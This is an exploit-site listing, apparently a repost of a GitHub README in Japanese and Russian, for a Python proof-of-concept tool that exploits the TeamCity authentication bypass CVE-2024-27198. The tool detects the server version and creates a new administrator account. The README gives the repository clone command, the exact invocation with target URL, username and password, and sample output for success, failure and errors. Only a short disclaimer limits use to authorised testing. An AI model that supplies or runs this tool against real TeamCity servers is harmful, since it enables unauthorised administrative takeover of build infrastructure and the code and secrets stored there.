Sploitus

Exploit for CVE-2024-27198

kitploit · 2026-09-04

Exploit Code

MARKDOWN200 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GENIUSZLY-CVE-2024-27198
# EN

**GenTeamCityExploit** は、TeamCity サーバーの脆弱性 (CVE-2024-27198) を標的とする PoC ツールです。認証バイパスの欠陥を悪用して、TeamCity のバージョン検出と新しい管理者ユーザーの作成を可能にします。

## 機能

  * TeamCity サーバーのバージョンを抽出します。
  * 既知の脆弱性 (CVE-2024-27198) の有無を確認します。
  * サーバーが脆弱な場合、新しい管理者ユーザーを作成します。



## 前提条件

  * **Python 3.6+** : Python がインストールされていることを確認してください。
  * **ライブラリ** : 以下のコマンドで必要なライブラリをインストールします。 

root@kitploit:~
        
        pip install requests urllib3
        




## 使用方法

  1. リポジトリをクローンします。 

root@kitploit:~
         
         git clone https://github.com/geniuszly/CVE-2024-27198
         

  2. ディレクトリに移動します。 

root@kitploit:~
         
         cd CVE-2024-27198
         

  3. 必要なパラメータを指定してスクリプトを実行します。 

root@kitploit:~
         
         python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
         

**パラメータ** : 
     * `-t`, `--target`: 対象の TeamCity サーバーの URL。
     * `-u`, `--username`: 新しい管理者ユーザーのユーザー名。
     * `-p`, `--password`: 新しい管理者ユーザーのパスワード。



## 使用例

root@kitploit:~
    
    
    python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
    

## 出力例

root@kitploit:~
    
    
    $ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
    
    [+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
    [+] Сервер уязвим! Возвращен HTTP код: 200
    [+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
    

サーバーが脆弱でない場合、またはバージョンが見つからない場合:

root@kitploit:~
    
    
    $ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
    
    [+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
    [-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
    

サーバーへの接続中にエラーが発生した場合:

root@kitploit:~
    
    
    $ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
    
    [-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
    

## 免責事項

このツールは教育目的のみを意図しており、所有者の明示的な許可なしにシステムで使用すべきではありません。コンピュータシステムへの不正アクセスは違法です。

# RU

**GenTeamCityExploit** — это PoC-инструмент, нацеленный на уязвимость сервера TeamCity (CVE-2024-27198). Он позволяет обнаружить версию TeamCity и создать нового администратора, используя уязвимость обхода аутентификации.

## Возможности

  * Извлекает версию сервера TeamCity.
  * Проверяет наличие известной уязвимости (CVE-2024-27198).
  * Создает нового пользователя-администратора, если сервер уязвим.



## Требования

  * **Python 3.6+** : Убедитесь, что у вас установлен Python.
  * **Библиотеки** : Установите необходимые библиотеки командой: 

root@kitploit:~
        
        pip install requests urllib3
        




## Использование

  1. Клонируйте репозиторий. 

root@kitploit:~
         
         git clone https://github.com/geniuszly/CVE-2024-27198
         

  2. Перейдите в папку с проектом. 

root@kitploit:~
         
         cd CVE-2024-27198
         

  3. Запустите скрипт с обязательными параметрами. 

root@kitploit:~
         
         python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
         

**Параметры** : 
     * `-t`, `--target`: URL целевого TeamCity сервера.
     * `-u`, `--username`: Имя пользователя для нового администратора.
     * `-p`, `--password`: Пароль для нового администратора.



## Пример

root@kitploit:~
    
    
    python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
    

## Пример вывода

root@kitploit:~
    
    
    $ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
    
    [+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
    [+] Сервер уязвим! Возвращен HTTP код: 200
    [+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
    

В случае, если сервер не уязвим или версия не найдена:

root@kitploit:~
    
    
    $ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
    
    [+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
    [-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
    

При возникновении ошибки подключения к серверу:

root@kitploit:~
    
    
    $ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
    
    [-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
    

## Отказ от ответственности

Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться на каких-либо системах без явного разрешения их владельца. Несанкционированный доступ к компьютерным системам является незаконным.